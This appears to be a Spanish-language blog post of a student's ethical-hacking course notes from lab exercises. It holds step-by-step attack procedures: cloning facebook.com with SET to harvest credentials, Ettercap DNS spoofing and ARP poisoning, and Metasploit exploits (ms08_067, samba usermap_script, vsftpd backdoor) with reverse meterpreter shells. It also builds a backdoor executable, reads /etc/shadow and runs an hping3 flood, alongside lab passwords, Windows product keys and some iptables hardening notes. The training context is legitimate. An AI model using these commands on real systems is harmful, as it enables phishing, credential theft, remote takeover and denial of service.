viernes, 28 de marzo de 2014

ETTERCAP CLONE PAGE Como si estuviera en primero


Go!!!

1.- Como primer paso se verifico la configuración de las tarjetas de red para garantizar la comunicación enntre las maquinas.

  • Se apunta los dispositivos en Adaptador puente

2.- Se ejecuto el comando ifconfig para verificar las ips de cada máquina

kali -> 192.168.10.27/24

Ubuntu víctima -> 192-168.10.28/24

3.- Ingresamos a SE-TOOLKIT en Kali Linux

se-toolkit
4.- Elegimos la opción 1 Social- Engineer Attacks

5.- Luego opción 2 Website Attack Vectors

6.- Paso siguiente la opción 3 Credential Harvester Attack Method

7.- Y la opcion 2 Site Cloner

8.- Indicamos la IP a la que serán re direccionadas las víctimas en éste caso la ip de Kali Linux 192.168.10.27
9.- Ingresamos el sitio web a clonar: www.facebook.com

esperamos el mensaje de confirmación y listo, el sitio estará corriendo en nuestra máquina bajo el puerto 80.

ETTERCAP

A continuacion se procede a confirgurar el archivo etter.dns que se encuentra en Archivos-> usr/share/ettercap/etter.dns.

Editamos éste archivo agregando 3 líneas básicas:

www.facebook.com A 192.168.10.27
*.facebook.* A 192.168.10.27
facebook.com PTR 192.168.10.27

Donde 192.168.10.27 es la IP de Kali Linux

Damos click en guardar y cerramos el archivo

Abrimos otro terminal y tecleamos lo siguiente:

ettercap -G

Se abrira una interfaz gráfica de Ettercap, ésto hace más sencillo el proceso de sniffing

1.- Click en Sniff
2.- Unified sniffing
eth0
3.- Aceptar
4.- Hosts
5.- Scan for hosts
6.- Hosts
7.- Hosts list

Seleccionamos 192.168.10.20 y click en Add to Target 1 y luego seleccionamos a nuestra víctima en este caso la IP 192.168.10.28 y click en Add to Target 2.

8.- Click en Plugins y Manage the plugins
9.- Dar doble click en dns_spoof ya que este es nuestro obejtivo redireccionar los clientes a la IP que deseamos.
10.- Arp poisoning y seleccionamos Sniff remote connections. Ésto se conoce como MAN IN THE MIDDLE de esta forma escucharemos y capturaremos las credenciales de la víctima.

11.- Start -> Start sniffing

LISTO!!!

Pruebas Ataques 2

nombres
Maquina virtual 1

nombre:linux
user: msfadmin
admin: msfadmin
para apagar: sudo su poweroff

maquina virtual 2
en lab eth2
abrir el archivo para los seriales
nombre: windowsxp
clave: usuario.123@
porbar usuario.123"

F7YTD-TJ9MX-DQ7DV-HRVCF-DRMRY
B77QF-DP27W-4H68R-72B48-78RPD
V2C47-MK7JD-3R89F-D2KXW-VPK3J



Server
en lab eth2
nombre: windows2008srv
windows server 1008 r2 enterprise complete installation
--> personalizada avanzada

nombre: kali
tipo:linux
version: Debian 64
800 RAM
40GB Disco minimo
nombre en blanco para que diga localhost
pass: usuario.123" o usuario.123@





Maquina windows xp 


comandos en kali linux

service network

poner la tarjet a apuente 

usuario :root
ifconfig eth0 192.168.100.212 netmask 255.255.255.0 ping 100.120


aplicaciones-> kalii linux nmap --> escaneo de la red, deteccion de las mac addres, puertos abiertos, tipo de SO 

#nmap -sP -oN resultado.txt 192.168.100.0/24 -> para ver que hosts estan arriba o funcionando
ls
gedit resultado.txt --> ver las ips arriba


-sP barrido de la red mediante Ping /24 a las 65000 maquinas


***Advanced IP Scanner
ipconfig de la maquina principal
lanzar con la ip 192.168.100.0/24


**** Nmap

Command: nmap -sS -sV -O 192.168.100.120  PUERTOS ABIERTOS --> ATAQUE MAS fuerte 

Target: 192.168.100.100-126
Command: nmap -sS -sV -O 192.168.100.100-126

protocolos icmp --> ping tracert


-------------------------MARZO 5

Primera etapa

1.- footprinting --> determinar objetivo

2.- escaneo--> puertos 

3.- enumeracion --> enumeramos nuestros objetivos

4.- hackeo/ataque: GNS3

configuracion en kali --> 192.168.10.11/24 GATEWAY: 192.168.10.10


Router--> hostname PruebaEh

Ip: 192.168.10.10/24

configurar Enable secret: cisco
configurar vty 04 --> cisco

en el router


conf ter
hostname nombre
interface fast 0/0

ip address 192.168.10.10 255.255.255.0
no shut down
do sh run
do ping 

---------cambiar contraseña kali linux: passwd -> nueva pass = 12345


---------Habilitar line vty y secret

conf ter
Enable secret cisco
line vty 0 4
password cisco
Login
Exit
wr --> escribir


---------telnet desde kali
en el terminal

telnet 192.168.10.10
password: cisco

En kali go to Aplicaciones-> Kali Linux -> Top 10 securyties tools-> wireshark

En wireshark luego de haberse logeado con telnet ir a:
Analyce -> Follow TCP Stream

Configuracion SSH a mano 6 lineas de configuracion Router CISCO

-------- en el router cisco service password-encryption

Nuevas pass: Py2911x
Z9911x


---------------Ataque de fuerza bruta
SISTEMA EN EL CUAL SE UTLIZAN TODAS LAS POSIBILIDADES DE UNION DE PALABRAS PARA ACCEDER A UN SISTEMA Y ESCALAR PRIVILEGIOS


CISCO AUDITING TOOL

KALI-> ATAQUES CON CONTRASEÑA-_> ATAQUES CON CONEXION->HYDRA- GTK 


en kali: cge.pl 192.168.10.10 1 -->  ver si CISCO es suseptible a cualquiera de los ataques listados en
Aplicaciones-> Kali Linux-_> Analisis de vulnerabilidades->herramientas cisco-->cisco-global-exploiter 


*****************SSH

HOSTname
interface fast 0/0
no shut
enable secret pass
enable password pass
service encryption 

domain-name domain.cl
crypto key generate rsa
1024

ssh time-out 15
ip ssh authentication-retries 2
username root password pass
line vty 0 4
transport input ssh
login local

sh ip ssh

disconnect ssh [numero vty]

ip ssh version 2

debug ip ssh

******************META EXPLOIT

windows 192.168.1.3


en kali 192.168.1.2

service postgresql start 

service metasploit start


NAMP DETECTAMOS A LA VICTIMA 

scanning
comando: db_nmap -sV -O 192.168.1.3 --> 
search msrpc
search ms08-067 --> 

exploit--> 

msf > services 

NESUS nos da el id de la vulnerabilidad 

NESUS vs nmap --> 

use exploit/windows/smb/ms08_067_netapi--> ejecuta el exploit

configurar las opcs

set RHOST 192.168.1.3 (RemoteHOST)

pilot -> codigo que se va aejecutar, como vamos a atacar a la maquina

set payload windows/meterpreter/reverse_tcp --> inyectar codigo

pasos para encontrar una vulnerabilidad: scaneo


kali---> 192.168.1.2
xp --> 192.168.1.3

************************************************METAEXPLOIT************************************* 
start postrgres
start metasploit


nmap-_> dbn_map
    search ms08-067
    use exploit/windows/smb/ms08_067_netapi
    show  options
    set RHOS 192.168.1.3
    show payloads

---> metter preter -_> enviar codigo tener control de la machine en windows en linux no
set payload windows/meterpreter/reverse_tcp --> inyectar codigo setear payload que quiero ejecutar
show options --> que necesito configurar
set LHOST 192.168.1.2 --> HOST A LA QUE SE LE VA A DAR EL CONTROL
exploit

/// OTRO PAYLOAD

search -h --> como se pueden buscar ciertos objetivos

serach type 

-------------------------------------------------- UBUNTU ESPLOIT

linux metasploitable 192.168.1.2 user/pass: msfadmin
kali 192.168.1.3


   
   
primer paso: foot printing

HERDERING SISTEMAS LINUX 

IPTABLES -_> FIREWALL que viene enbebido dentro de linux

--> arrancar postgresql y metasploit

en msf> nmap -sS -sV 192.168.1.2

search samba


------->exploit a 192.168.1.2

msf> use exploit/multi/samba/usermap_script
set RHOST
set LHOST

EXPLOIT
WHOAMI

en linux /etc/shadow --> claves de todos los servicios

---> crear usuario en LINUX
user add juanito

ps -ef --> ver procesos
kill [numero_procesos] 


------maquina como pivote 

*************************ATAQUE A JAVA

investigar ataque mysql/apache

******************IRC comando de comunicacion en real time


*******************************HARDENING 
Servicios innecesarios

ps -ef --> ver servicios


PASOS DEL HARDENING:
1.- Poner un firewal
2.- poner un antivirus
3.- actualizar
4.- bajar servicios innecesarios

unrealircd --> irc 

---------------------------------------Miercoles 12
Cuadrante de gardner --> el firewall mejor es checkpoint
linux metasploitable 192.168.1.2 user/pass: msfadmin
kali 192.168.1.3

en LINUX 


PARA BLOQUEAR ICMP
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP

PERMITIR ICMP
iptables -A INPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j ACCEPT
iptables -A OUTPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j ACCEPT

IPTABLES -L --> VER POLITICAS IP TABLES 


********************************************************Para que haga nuevamente ping
primero --> iptables -P INPUT/OUTPUT ACCEPT
Y LUEGO --> iptables -A INPUT/OUTPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j DROP
*********************************************************


*************************se crea un archivo .sh con el nombre mifirewall.sh con las reglas y se corre haciendo sh mifirewall.sh

puerto IRC: Puerto 6667

***********************************HACKING ETICO RED INALÁMBRICA**************
Espectro electromagnetico


Kali y wifi Slax

WI-FI (Woreless Fidelity) creada por WECA (Wireless Ethernet Compability Alliance)


802.11 a/b/g/n --> 

sistemas inalambricos trabaja en la capa de enlace de datos capa 2 del modelo OSI


*************************************** WIRELESS HACKING
wap AS Enterprise es la mejor proteccion

***************************************************************INGENIERIA SOCIAL
Aprovechar de cualquier tipo de relacion social de amistad, relacion laboral, etc.

Ingenieria social se divide en dos partes/tipos:

1 Factor humano

2 Interviene el cmputador- tecnologico 

cohersion: una persona se haga pasar por otra


fases:

1 Research -- investigacion, reunir informacion acerca del objetivo

2 hook: enganche o anzuelo: movimiento inicial, iniciar una conversacion--> fin investigacion

3 Play actuar: relacion mas fuerte

4 Exit: Salida esta es la ultima fase del ataque de ingenieria social.

Piggybacking: engaño, entrar a un area restringida de la empresa

Eersonating (hacerce pasar por alguien ) 

el espionaje: escucha no autorizada -- sniffer

**********************Revertir la ingenieria social


*********************************************************Ingenieria social basada en la computadora

POP UP WinDOWS
Phishing (pesca) reemplezar paginas, contenidos de correo electronico




herramientas SET: 


ActiveX --> 


KALI--_> msfcon  9


puerto 444


cd /root
cd .set
ls
cd template.pdf oficiourgente.pdf
sl
ls


http://www.securitytube.net/video/8050

100.205

gateway 100.15

*******************************************Lunes 24 de Marzo ataque Windows 7 




msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 x > /root/exploit.exe -> se crea en el escritorio copiar esto a windows


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options 
set LHOST 192.168.1.2
exploit

Pruebas de ataques 1

Ataque WEP
Herramienta: minidwep
Para obtener SSID oculto, se bede tipear en el terminal: besside-ng -b MAC mon0
Bsucar puertos: nmap -sS -sV rango ip, o ip especifica (192.168.10.0/24, 192.168.10.0-224)  
Ataque Linux
  • Samba – Netbios: 
  • search samba 
  • use exploit/multi/samba/usermap_script 
  • set payload cmd/unix/reverse 
  •  Otro: search osvdb:73573 
  • use exploit/unix/ftp/vsftpd_234_backdoor 
  • set payload amd/unix/intercat 
  • search distcc 
  • use exploit/unix/misc/distcc_exec 
  • search irc o unreal 
  • use exploit/unix/irc/unreal_irc_3281_backdoor  
Ataque windows
  • XP 
  • search ms08-067 
  • use expoit/windows/smb/·..... 
  • set payload windows/meterpreter/reverse_tcp, (windows/shell/reverse_tcp) 
  • show options 
  • set LHOST ip atacante 
  •  set RHOST victima exploit 
  •  VNC: set payload windows/vncinject/reverse_tcp exploit 
  •  set payload windows/adduser 
  • set USER nombre usuario 
  •  set PASS pasword 
  • WINDOWS 7 
    • msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 x > /root/Desktop/exploit.exe -> se crea en el escritorio copiar esto a windows 
    • use exploit/multi/handler 
    • set payload windows/meterpreter/reverse_tcp 
    • show options 
    • set LHOST 192.168.1.2 
    • exploit 
    •  OTRO:
    • use exploit /multi/browser/firefox_xpi_bootstrap_addon 
    • set PAYLOAD windows/meterpreter/reverse_tcp 
    • set SRVHOST (maquina del atacante) 
    • set URIPATH / exploit show options
  • hping3 -p80 -s --flood ip_victima